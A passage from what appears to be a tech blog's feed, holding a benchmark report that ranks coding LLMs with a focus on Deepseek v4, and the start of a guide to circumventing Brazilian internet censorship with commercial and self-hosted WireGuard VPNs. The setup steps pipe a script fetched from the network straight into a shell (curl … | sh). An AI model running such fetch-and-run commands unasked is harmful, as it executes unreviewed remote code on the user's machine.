]]></content:encoded><category>ai-memory</category><category>coding-agents</category><category>open-source</category></item><item><title>LLM Benchmarks: The latest Deepseek v4, stop asking</title><link>https://www.akitaonrails.com/en/2026/08/22/llm-benchmarks-the-latest-deepseek-v4-stop-asking/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/22/llm-benchmarks-the-latest-deepseek-v4-stop-asking/</guid><pubDate>Sat, 22 Aug 2026 15:00:00 GMT</pubDate><description>&lt;p&gt;Last week I published the round with &lt;a href="https://www.akitaonrails.com/en/2026/08/15/llm-benchmarks-qwen-3-8-glm-5-3-gemini-3-7/"&gt;Qwen 3.8, GLM 5.3, Gemini 3.7 and Grok 4.6&lt;/a&gt; on my v2 benchmark: the three-phase test (build, validate everything actually running, self-review with an honesty score) that production-hardens a Rails 8 LLM chat app. The top is unchanged: Fable 5 at 96, the trio Sonnet 5, Opus 5 and Kimi K3 at 95, GLM 5.3 alone at 94, and the 93 pack right behind.&lt;/p&gt;</description><content:encoded><![CDATA[<p>Last week I published the round with <a href="/en/2026/08/15/llm-benchmarks-qwen-3-8-glm-5-3-gemini-3-7/">Qwen 3.8, GLM 5.3, Gemini 3.7 and Grok 4.6</a> on my v2 benchmark: the three-phase test (build, validate everything actually running, self-review with an honesty score) that production-hardens a Rails 8 LLM chat app. The top is unchanged: Fable 5 at 96, the trio Sonnet 5, Opus 5 and Kimi K3 at 95, GLM 5.3 alone at 94, and the 93 pack right behind.</p>
<p>And every single time I publish one of these updates, without exception, someone shows up in the comments: <em>&ldquo;what about Deepseek?&rdquo;</em></p>
<p>I confess I do not understand this blind focus on Deepseek. It is one open model among many, with nothing that sets it apart from the pack. In my daily use, I still prefer Kimi K3 or GLM 5.3. Yes, every iteration improves a little. Yes, I tested both new snapshots (Flash 0731 and Pro 0813) and the numbers are below. And even so, the answer stays the same: nobody there is in Fable 5 or Sol class.</p>
<h2>What this score measures (and what it does not)<span class="hx:absolute hx:-mt-20" id="what-this-score-measures-and-what-it-does-not"></span>
    <a href="#what-this-score-measures-and-what-it-does-not" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Before the numbers, the reminder that needs repeating every round. The benchmark tests a very specific slice: <strong>easy</strong> web programming. A Rails chat CRUD with streaming, tools, concurrency and tests. It is a useful test because it is concrete, reproducible and catches API hallucination red-handed, but it is still a narrow slice.</p>
<p>It says nothing about far more advanced tasks: kernel driver development, game engine optimization, real offensive security. Testing the entirety of a model is impossible. What you can test is a subset, and that is what I did.</p>
<p>So next time you read &ldquo;Kimi is about to dethrone Fable&rdquo; or &ldquo;GLM is about to pass Sol&rdquo; because the scores came out close, read it like this: within a narrow slice of web programming, any of these models delivers. That is all. A close score on this test means proximity <strong>on this test</strong>, nothing more.</p>
<blockquote>
  <p><strong>Keep this:</strong> a benchmark measures a slice. Mine measures easy Rails web apps. Anyone extrapolating that into &ldquo;model X beats model Y at everything&rdquo; is reading the number wrong.</p>

</blockquote>
<h2>The Tier A ranking, with a focus on time<span class="hx:absolute hx:-mt-20" id="the-tier-a-ranking-with-a-focus-on-time"></span>
    <a href="#the-tier-a-ranking-with-a-focus-on-time" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The usual table, A.1 cut (90 points or more), now with both Deepseeks in <strong>bold</strong>. This time, pay attention to the time column: same test, same three phases, for everyone.</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">#</th>
          <th>Model</th>
          <th style="text-align: right">Score</th>
          <th>Harness</th>
          <th style="text-align: right">Time</th>
          <th style="text-align: right">Cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">1</td>
          <td>Claude Fable 5</td>
          <td style="text-align: right">96</td>
          <td>Claude Code</td>
          <td style="text-align: right">46 min</td>
          <td style="text-align: right">$26.03</td>
      </tr>
      <tr>
          <td style="text-align: right">2</td>
          <td>Claude Sonnet 5</td>
          <td style="text-align: right">95</td>
          <td>Claude Code</td>
          <td style="text-align: right">59 min</td>
          <td style="text-align: right">$25.83</td>
      </tr>
      <tr>
          <td style="text-align: right">2</td>
          <td>Claude Opus 5</td>
          <td style="text-align: right">95</td>
          <td>Claude Code</td>
          <td style="text-align: right">78 min</td>
          <td style="text-align: right">$38.91</td>
      </tr>
      <tr>
          <td style="text-align: right">2</td>
          <td>Kimi K3</td>
          <td style="text-align: right">95</td>
          <td>Kimi CLI</td>
          <td style="text-align: right">65 min</td>
          <td style="text-align: right">$6.14</td>
      </tr>
      <tr>
          <td style="text-align: right">5</td>
          <td>GLM 5.3</td>
          <td style="text-align: right">94</td>
          <td>OpenCode</td>
          <td style="text-align: right">80 min</td>
          <td style="text-align: right">$0 (≈$2.59)</td>
      </tr>
      <tr>
          <td style="text-align: right">6</td>
          <td>GPT 5.6 Sol</td>
          <td style="text-align: right">93</td>
          <td>Codex</td>
          <td style="text-align: right">57 min</td>
          <td style="text-align: right">~$45</td>
      </tr>
      <tr>
          <td style="text-align: right">6</td>
          <td>Claude Opus 4.8</td>
          <td style="text-align: right">93</td>
          <td>Claude Code</td>
          <td style="text-align: right">53 min</td>
          <td style="text-align: right">$21.82</td>
      </tr>
      <tr>
          <td style="text-align: right">6</td>
          <td>GPT 5.6 Terra</td>
          <td style="text-align: right">93</td>
          <td>Codex</td>
          <td style="text-align: right">48 min</td>
          <td style="text-align: right">$16.92</td>
      </tr>
      <tr>
          <td style="text-align: right">6</td>
          <td>Gemini 3.7 Flash</td>
          <td style="text-align: right">93</td>
          <td>OpenCode</td>
          <td style="text-align: right">43 min</td>
          <td style="text-align: right">$4.12</td>
      </tr>
      <tr>
          <td style="text-align: right">10</td>
          <td>GLM 5.2</td>
          <td style="text-align: right">92</td>
          <td>OpenCode</td>
          <td style="text-align: right">155 min</td>
          <td style="text-align: right">$0 (≈$12.05)</td>
      </tr>
      <tr>
          <td style="text-align: right">10</td>
          <td>Kimi K2.5</td>
          <td style="text-align: right">92</td>
          <td>OpenCode</td>
          <td style="text-align: right">43 min</td>
          <td style="text-align: right">$1.50</td>
      </tr>
      <tr>
          <td style="text-align: right">10</td>
          <td>Gemini 3.6 Flash @ high</td>
          <td style="text-align: right">92</td>
          <td>Antigravity</td>
          <td style="text-align: right">15 min</td>
          <td style="text-align: right">—</td>
      </tr>
      <tr>
          <td style="text-align: right">10</td>
          <td>Qwen 3.8 Max</td>
          <td style="text-align: right">92</td>
          <td>OpenCode</td>
          <td style="text-align: right">78 min</td>
          <td style="text-align: right">$9.16</td>
      </tr>
      <tr>
          <td style="text-align: right">10</td>
          <td>Grok 4.6</td>
          <td style="text-align: right">92</td>
          <td>OpenCode</td>
          <td style="text-align: right">34 min</td>
          <td style="text-align: right">$6.33</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>MiniMax M3</td>
          <td style="text-align: right">91</td>
          <td>OpenCode</td>
          <td style="text-align: right">113 min</td>
          <td style="text-align: right">$7.72</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>Kimi K2.6</td>
          <td style="text-align: right">91</td>
          <td>OpenCode</td>
          <td style="text-align: right">34 min</td>
          <td style="text-align: right">$2.64</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>Claude Opus 4.7</td>
          <td style="text-align: right">91</td>
          <td>Claude Code</td>
          <td style="text-align: right">44 min</td>
          <td style="text-align: right">$44.28</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>GPT 5.6 Luna</td>
          <td style="text-align: right">91</td>
          <td>Codex</td>
          <td style="text-align: right">46 min</td>
          <td style="text-align: right">$16.79</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td><strong>Deepseek v4 Pro (0813)</strong></td>
          <td style="text-align: right"><strong>91</strong></td>
          <td>OpenCode</td>
          <td style="text-align: right"><strong>82 min</strong></td>
          <td style="text-align: right"><strong>$5.01</strong></td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>Grok 4.5</td>
          <td style="text-align: right">91</td>
          <td>grok CLI</td>
          <td style="text-align: right">25 min</td>
          <td style="text-align: right">$0 (≈$1.62)</td>
      </tr>
      <tr>
          <td style="text-align: right">21</td>
          <td><strong>Deepseek v4 Flash (0731)</strong></td>
          <td style="text-align: right"><strong>90</strong></td>
          <td>OpenCode</td>
          <td style="text-align: right"><strong>88 min</strong></td>
          <td style="text-align: right"><strong>$0.82</strong></td>
      </tr>
  </tbody>
</table>
<p><em>Time is the wall clock of the three phases; cost is the API equivalent. Same criteria as the previous articles, linked at the end.</em></p>
<p>Look at the time spread. The fastest in the group finishes the test in 15 minutes; the slowest takes 155, <strong>ten times longer</strong>. Both Deepseeks sit in the lower half of the table for speed: 82 and 88 minutes, behind almost everyone in the same score range. The Flash, in particular, burned <strong>44 million tokens</strong> in one run. For comparison, GLM 5.3 scored one point higher with 19.4 million. Deepseek makes up for it on the invoice: the Flash&rsquo;s $0.82 is the cheapest Tier A run to date.</p>
<h2>The new snapshots: what changed since July<span class="hx:absolute hx:-mt-20" id="the-new-snapshots-what-changed-since-july"></span>
    <a href="#the-new-snapshots-what-changed-since-july" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I ran the July builds of v4 at the end of that month: Flash scored 80, Pro scored 82, both Tier B. Both dated snapshots (0731 and 0813) ran today under the same rigor, and both entered Tier A:</p>
<p><strong>Flash 0731: from 80 to 90 (+10).</strong> The most visible improvement is behavioral. The July build pinned a model three generations old; this one got the pin right on the first try (<code>anthropic/claude-sonnet-5</code>, no stale slug). The self-review was exemplary: it found on its own that the streaming bubble partial was dead code (no assistant reply appeared until a forced reload through phases 1 and 2), confessed, fixed it and scored 15/15 on honesty. It lost points where the pack loses them: concurrency without a turn lock (8) and coverage without branch (8).</p>
<p><strong>Pro 0813: from 82 to 91 (+9).</strong> The big news is what disappeared: the <code>reasoning_content</code> bug that broke its multi-turn on OpenCode, and that forced me to invent the <a href="/en/2026/05/04/llm-benchmarks-deepseek-unlocked-deepclaude/">deepclaude workaround</a> back in May, was fixed in opencode 1.18.4, and this snapshot ran end to end on the generic harness, no crutches. The technical highlight was concurrency: a SQLite store with read-modify-write inside a <code>BEGIN IMMEDIATE</code> transaction, the most serious solution in the group on that dimension (9/10). The losses were honest and self-confessed: stale sonnet-4.6 pin, streaming verified by unit test only, no fallback token-budget estimator.</p>
<p>Clean, shielded runs, zero reads of the rubric or of anyone else&rsquo;s app. The full reports are in the <a href="https://github.com/akitaonrails/llm-coding-benchmark"target="_blank" rel="noopener">benchmark repository</a>.</p>
<h2>Deepseek against itself: the trajectory is real<span class="hx:absolute hx:-mt-20" id="deepseek-against-itself-the-trajectory-is-real"></span>
    <a href="#deepseek-against-itself-the-trajectory-is-real" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Old and new criteria do not compare point for point, so this section is about behavior, not scores. And behavior you can compare, because the contrast is stark.</p>
<p>In April, <strong>DeepSeek V3.2</strong> scored 43 under the old criteria and starred in the most embarrassing moment in the benchmark&rsquo;s history: it invented the entire RubyLLM integration. <code>RubyLLM::Client.new</code>, <code>client.chat(messages:)</code>, both methods hallucinated, the whole LLM layer fictional.</p>
<p>Still under the old criteria, <strong>v4 Flash</strong> scored 78 with a fatal one-character bug (the model slug missing the <code>anthropic/</code> prefix), and <strong>v4 Pro</strong> DNF&rsquo;d at 69: Tier 1 code, Tier 3 deliverables, taken down by the <code>reasoning_content</code> bug that ate the conversation history. That bug is what spawned the deepclaude hack, where the same Pro jumped to 89.</p>
<p>On v2, the July builds scored 80 and 82. Today&rsquo;s snapshots, 90 and 91. From &ldquo;invented the entire API&rdquo; to &ldquo;finds its own dead code and confesses it in self-review&rdquo; in four months. Deepseek&rsquo;s curve is one of the steepest this benchmark has ever recorded, and pretending otherwise would be dishonest.</p>
<h2>And against the other Chinese models?<span class="hx:absolute hx:-mt-20" id="and-against-the-other-chinese-models"></span>
    <a href="#and-against-the-other-chinese-models" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>This is where the conversation gets less exciting for the cheering section. On the same generic harness (OpenCode), the Chinese pack looks like this:</p>
<table>
  <thead>
      <tr>
          <th>Model</th>
          <th style="text-align: right">Score</th>
          <th style="text-align: right">Time</th>
          <th style="text-align: right">Cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>GLM 5.3</td>
          <td style="text-align: right">94</td>
          <td style="text-align: right">80 min</td>
          <td style="text-align: right">$0 (≈$2.59)</td>
      </tr>
      <tr>
          <td>Qwen 3.8 Max</td>
          <td style="text-align: right">92</td>
          <td style="text-align: right">78 min</td>
          <td style="text-align: right">$9.16</td>
      </tr>
      <tr>
          <td>Kimi K2.5</td>
          <td style="text-align: right">92</td>
          <td style="text-align: right">43 min</td>
          <td style="text-align: right">$1.50</td>
      </tr>
      <tr>
          <td>Deepseek v4 Pro (0813)</td>
          <td style="text-align: right">91</td>
          <td style="text-align: right">82 min</td>
          <td style="text-align: right">$5.01</td>
      </tr>
      <tr>
          <td>Deepseek v4 Flash (0731)</td>
          <td style="text-align: right">90</td>
          <td style="text-align: right">88 min</td>
          <td style="text-align: right">$0.82</td>
      </tr>
  </tbody>
</table>
<p>And Kimi K3, absent from this table because it ran on its native harness, scored 95. In other words: within the same test, Deepseek v4 arrives behind GLM 5.3, Qwen 3.8 Max and the Kimis, while being the slowest and most verbose of the Chinese group. Its advantage is a single one, and it is real: price. $0.82 for a Tier A run is impressive, and the Pro at $5.01 undercuts almost everyone at the same score.</p>
<p>If your criterion is &ldquo;maximum competence per dollar on simple web tasks&rdquo;, the Flash 0731 deserves attention. If the criterion is the best model in the group, the answer is still Kimi K3 and GLM 5.3, same as last week.</p>
<h2>Conclusion: stop asking<span class="hx:absolute hx:-mt-20" id="conclusion-stop-asking"></span>
    <a href="#conclusion-stop-asking" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>There, now there are numbers on the table. Deepseek v4 genuinely improved between July and August, both snapshots entered Tier A, the Pro got rid of the bug that demanded a harness workaround, and the Flash is the cheapest Tier A run I have ever executed. All of that is fact.</p>
<p>And none of it changes the picture. The leadership stays with Fable 5, Sonnet 5, Opus 5 and Sol; the first Chinese model in line is still Kimi K3, followed by GLM 5.3. Deepseek is one more competent model on a slice of easy tasks, with the virtue of being cheap and the defect of being verbose. Next time you feel the urge to comment &ldquo;what about Deepseek?&rdquo;, the answer is this article.</p>
]]></content:encoded><category>llm-benchmarks</category><category>llms</category><category>coding-agents</category></item><item><title>Survival Guide for a Censored Internet</title><link>https://www.akitaonrails.com/en/2026/08/19/survival-guide-for-a-censored-internet/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/19/survival-guide-for-a-censored-internet/</guid><pubDate>Wed, 19 Aug 2026 12:00:00 GMT</pubDate><description>&lt;p&gt;Last week I wrote about &lt;a href="https://www.akitaonrails.com/en/2026/08/13/understanding-the-discord-censorship-and-brazils-digital-eca/"&gt;the Discord censorship and Brazil&amp;rsquo;s Digital ECA law&lt;/a&gt;, the Digital ECA (&amp;ldquo;Estatuto Digital da Criança e do Adolescente&amp;rdquo;, the digital version of Brazil&amp;rsquo;s Child and Adolescent Statute): the ANPD (Brazil&amp;rsquo;s data protection authority, now also the country&amp;rsquo;s de facto internet regulator) ordered the Go Live feature shut down nationwide because end-to-end encryption prevents content surveillance, and in the same package came the first sentence enhancement in Brazilian history for committing a crime &amp;ldquo;using a VPN&amp;rdquo;. After that article, the question I got the most was the obvious one: &lt;em&gt;&amp;ldquo;OK, so what do I do?&amp;rdquo;&lt;/em&gt;&lt;/p&gt;</description><content:encoded><![CDATA[<p>Last week I wrote about <a href="/en/2026/08/13/understanding-the-discord-censorship-and-brazils-digital-eca/">the Discord censorship and Brazil&rsquo;s Digital ECA law</a>, the Digital ECA (&ldquo;Estatuto Digital da Criança e do Adolescente&rdquo;, the digital version of Brazil&rsquo;s Child and Adolescent Statute): the ANPD (Brazil&rsquo;s data protection authority, now also the country&rsquo;s de facto internet regulator) ordered the Go Live feature shut down nationwide because end-to-end encryption prevents content surveillance, and in the same package came the first sentence enhancement in Brazilian history for committing a crime &ldquo;using a VPN&rdquo;. After that article, the question I got the most was the obvious one: <em>&ldquo;OK, so what do I do?&rdquo;</em></p>
<p>This article is the answer: a practical guide, from easiest to hardest, to keep your communication channels standing as the siege tightens. Because the siege <strong>is</strong> tightening, and you should understand its pace before picking your tools.</p>
<h2>The track record: none of this is new<span class="hx:absolute hx:-mt-20" id="the-track-record-none-of-this-is-new"></span>
    <a href="#the-track-record-none-of-this-is-new" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Anyone surprised by the Discord case was not paying attention. The Brazilian judiciary has been blocking communication services for over a decade, always steamrolling millions of innocent users to reach half a dozen suspects:</p>
<ul>
<li><strong>WhatsApp, 2015 and 2016</strong>: blocked <a href="https://g1.globo.com/tecnologia/noticia/2022/03/18/whatsapp-ja-foi-bloqueado-por-decisao-judicial-em-2015-e-2016-no-brasil.ghtml"target="_blank" rel="noopener">three times by lower-court judges</a>, always because the company would not hand over conversations that, by design, it cannot read.</li>
<li><strong>Telegram, 2022 and 2023</strong>: suspended <a href="https://www.gazetadopovo.com.br/republica/stf-voltara-a-julgar-bloqueio-do-whatsapp-moraes-ja-suspendeu-telegram/"target="_blank" rel="noopener">for two days by order of Justice Alexandre de Moraes in March 2022</a>, and again by a federal judge in 2023. <a href="https://www.migalhas.com.br/depeso/414499/stf-alem-do-x-relembre-os-bloqueios-do-whatsapp-e-telegram-no-brasil"target="_blank" rel="noopener">Migalhas has the full timeline</a>.</li>
<li><strong>X/Twitter, 2024</strong>: the landmark. <a href="https://itforum.com.br/noticias/de-outubro-a-outubro-confronto-x-e-stf/"target="_blank" rel="noopener">Nationwide suspension from August 30 to October 8</a>, <strong>40 days</strong>, by a single justice&rsquo;s order. And here is the detail that matters for this guide: the decision included <a href="https://www.gazetadopovo.com.br/mundo/crise-eua-moraes-twitter-files-lei-magnitsky/"target="_blank" rel="noopener">a fine of R$ 50,000 (~US$ 10,000) per day for any individual who accessed X through a VPN</a>, an order for app stores to remove VPN apps (walked back hours later), and <a href="https://istoedinheiro.com.br/pf-e-anatel-enviam-ao-stf-relatorios-sobre-acessos-ao-x-mesmo-com-bloqueio"target="_blank" rel="noopener">the Federal Police and Anatel (the telecom regulator) producing reports on who bypassed the block</a> to support the fines.</li>
</ul>
<p>Notice what happened there: for the first time, using a neutral privacy tool became, by itself, punishable conduct in Brazil. Nobody was fined in the end, but the infrastructure to fine people was built, tested and documented. And in 2026 Congress voted and the president signed a sentence enhancement for crimes committed with a VPN. The X precedent stopped being an exception and became repertoire.</p>
<blockquote>
  <p><strong>Keep this:</strong> in the X case, the Brazilian state already treated VPN users as offenders, already tried to pull VPNs from app stores, and already requested reports on who bypassed the block. All of it documented, in court orders and public reports.</p>

</blockquote>
<h2>The endgame: the Chinese model<span class="hx:absolute hx:-mt-20" id="the-endgame-the-chinese-model"></span>
    <a href="#the-endgame-the-chinese-model" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I have little doubt that very well-positioned people in government look at <a href="https://freedomhouse.org/country/china/freedom-net/2024"target="_blank" rel="noopener">China&rsquo;s Great Firewall</a> with envy, not horror. And it is worth understanding what it is, because it defines the limit of the game.</p>
<p>The Firewall goes far beyond blocking websites. It is deep packet inspection (DPI) at national scale, running on the country&rsquo;s internet backbone: all traffic is classified in real time, known VPN protocols are identified by their handshake shape and dropped, Tor is blocked by default, and only <strong>state-approved VPNs</strong> (meaning, with a backdoor) operate legally. Ordinary citizens caught using unauthorized VPNs get fined. And even when the traffic cannot be read, the metadata gives the game away: who talks to whom, when, for how long.</p>
<p>That is why the honest answer to &ldquo;can you bypass a Firewall like that without being noticed?&rdquo; is: <strong>no, not for an ordinary citizen</strong>. Against a state-level firewall of that caliber, no consumer tool makes you invisible. At best it makes you too expensive to be worth persecuting at scale. Anyone selling you total invisibility is lying.</p>
<p>The good news is that Brazil is nowhere near that point. Censorship rarely arrives all at once: it comes in steps, and each step has a matching defense. The rest of this guide is that staircase, step by step. The logic behind everything that follows is a single one: <strong>censorship is a matter of cost</strong>. Our job is to make blocking expensive, technically and politically, until mass deployment becomes impractical.</p>
<blockquote>
  <p><strong>Keep this:</strong> against a complete state firewall, no tool makes you invisible, only too expensive to persecute at scale. The game is climbing your staircase before the censor climbs his.</p>

</blockquote>
<h2>Phase 1: Commercial VPN, the minimum everyone should have<span class="hx:absolute hx:-mt-20" id="phase-1-commercial-vpn-the-minimum-everyone-should-have"></span>
    <a href="#phase-1-commercial-vpn-the-minimum-everyone-should-have" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Start with the obvious. A VPN (virtual private network) creates an encrypted tunnel between your device and a provider&rsquo;s server. Your ISP (internet service provider) now sees only a scrambled flow going to a single address; the sites you visit see the VPN&rsquo;s IP, not yours. I explain it in depth, with the networking theory underneath, in <a href="https://akitaonrails.com/2022/08/29/akitando-126-criando-uma-rede-segura-introducao-a-redes-parte-6-vpn-e-nas/"target="_blank" rel="noopener">Akitando 126</a> (in Portuguese).</p>
<p>What a VPN <strong>does</strong>: hides your traffic from your ISP, swaps your exit IP, gets you out of geo-blocks and of court-ordered DNS/IP blocks. What it <strong>does not do</strong>:</p>
<ul>
<li><strong>It does not make you anonymous.</strong> The VPN provider sees all your traffic in place of your ISP. You did not eliminate the watcher, you just picked a different watcher.</li>
<li><strong>It does not hide your identity if you paid by credit card.</strong> A credit card subscription ties the VPN account to your tax ID. If authorities show up at the provider with a court order, your name is there.</li>
<li><strong>It does not protect content past the tunnel.</strong> From the VPN exit to the final website, the web&rsquo;s normal encryption (HTTPS) applies. The VPN is one leg of the path, not the whole path.</li>
</ul>
<p>That said, for the early phases of the siege it does the job. My recommendations, in order:</p>
<ul>
<li><strong><a href="https://protonvpn.com/"target="_blank" rel="noopener">ProtonVPN</a></strong>: Switzerland, outside easy jurisdiction, open source and audited, a no-logs policy tested in court, a decent free tier, and it accepts payment even in cash by mail.</li>
<li><strong><a href="https://mullvad.net/"target="_blank" rel="noopener">Mullvad</a></strong>: Sweden, the most paranoid on the market: it does not even ask for an email, your account is a random number. Flat €5/month, accepts cash in an envelope and cryptocurrency. It is the closest thing to an &ldquo;identity-less VPN&rdquo; that exists as a commercial product.</li>
<li>NordVPN and the like work technically, but their money goes more to marketing than to privacy posture. Among the big ones, I stick with the two above.</li>
</ul>
<p><strong>The limit of this phase</strong> is well known: the exit IPs of famous VPNs are public and catalogued. An order from ANPD or Anatel to national ISPs to block those ranges is technically trivial, and the X case showed that pulling the app from the store is also on the menu. When (not if) that happens, the commercial VPN dies in a day. That is why Phase 2 exists.</p>
<blockquote>
  <p><strong>Keep this:</strong> a commercial VPN is a seatbelt: use it always, but know it depends on three things outside your control. The app staying in the store, the IPs staying unblocked, and the provider staying honest.</p>

</blockquote>
<h2>Phase 2: Self-hosted VPN, your own tunnel<span class="hx:absolute hx:-mt-20" id="phase-2-self-hosted-vpn-your-own-tunnel"></span>
    <a href="#phase-2-self-hosted-vpn-your-own-tunnel" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The move here changes shape: instead of subscribing to a service with millions of users and catalogued IPs, you rent a cheap little server outside Brazil and build your personal VPN. There is no public list with your IP for the censors to download. You are one user on an unknown IP, indistinguishable from any other traffic until someone looks closely.</p>
<p><strong>Picking the provider (and why not AWS, Azure or Google Cloud).</strong> The big clouds have huge, public, well-mapped IP ranges (ASNs). Blocking them wholesale is one line in a routing table; the only brake is collateral damage (plenty of legitimate Brazilian businesses live there), and other countries have paid that price in crises. Smaller providers dilute that target. Options I would consider, from mid-sized to small:</p>
<table>
  <thead>
      <tr>
          <th>Provider</th>
          <th>Based in</th>
          <th>Why</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><a href="https://www.hetzner.com/cloud"target="_blank" rel="noopener">Hetzner</a></td>
          <td>Germany/Finland</td>
          <td>Cheap, reliable, out of easy reach</td>
      </tr>
      <tr>
          <td><a href="https://www.ovhcloud.com/"target="_blank" rel="noopener">OVH</a> / <a href="https://www.scaleway.com/"target="_blank" rel="noopener">Scaleway</a></td>
          <td>France</td>
          <td>Same, European jurisdiction</td>
      </tr>
      <tr>
          <td><a href="https://contabo.com/"target="_blank" rel="noopener">Contabo</a></td>
          <td>Germany</td>
          <td>Very cheap, low profile</td>
      </tr>
      <tr>
          <td><a href="https://www.vultr.com/"target="_blank" rel="noopener">Vultr</a> / <a href="https://www.digitalocean.com/"target="_blank" rel="noopener">DigitalOcean</a></td>
          <td>US/global</td>
          <td>Mid-sized, known but not giant</td>
      </tr>
      <tr>
          <td><a href="https://my.frantech.ca/"target="_blank" rel="noopener">BuyVM</a>, <a href="https://hosthatch.com/"target="_blank" rel="noopener">HostHatch</a>, <a href="https://liteserver.nl/"target="_blank" rel="noopener">LiteServer</a></td>
          <td>US/Europe</td>
          <td>Small, off every obvious list</td>
      </tr>
  </tbody>
</table>
<p>A US$ 3 to 5 machine with 1 GB of RAM is plenty for a personal VPN. <strong>Important caveat:</strong> paying for a VPS (virtual private server) with a credit card leaves a trail just like the commercial VPN: your name is in the provider&rsquo;s records, and the provider can be legally compelled. Some accept cryptocurrency, which reduces (does not eliminate) the trail. For most people, at this phase, the signup risk is acceptable: you are not hiding from a named investigation, you are getting out of the aim of a mass block.</p>
<h3>Step by step: WireGuard with wg-easy<span class="hx:absolute hx:-mt-20" id="step-by-step-wireguard-with-wg-easy"></span>
    <a href="#step-by-step-wireguard-with-wg-easy" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>I will use <a href="https://github.com/wg-easy/wg-easy"target="_blank" rel="noopener">wg-easy</a>, which packages WireGuard (the modern, fast, auditable VPN protocol) into a Docker container with a web panel and QR codes to set up your phone in seconds.</p>
<p><strong>1. Rent the VPS.</strong> Ubuntu 24.04, the smallest machine available, in a region outside Brazil (Amsterdam, Frankfurt and Helsinki are classic choices for jurisdiction and acceptable latency).</p>
<p><strong>2. Log in and update:</strong></p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ssh root@YOUR_IP
</span></span><span class="line"><span class="cl">apt update <span class="o">&amp;&amp;</span> apt upgrade -y</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p><strong>3. Install Docker:</strong></p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl -fsSL https://get.docker.com <span class="p">|</span> sh</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p><strong>4. Generate the panel password hash</strong> (wg-easy does not accept a plaintext password; write down the password you choose):</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">docker run --rm -it ghcr.io/wg-easy/wg-easy wgpw <span class="s1">&#39;YourStrongPasswordHere&#39;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># the output looks like: PASSWORD_HASH=$2b$12$abc...</span>
</span></span><span class="line"><span class="cl"><span class="c1"># in the command below, double every dollar sign: $ becomes $$</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
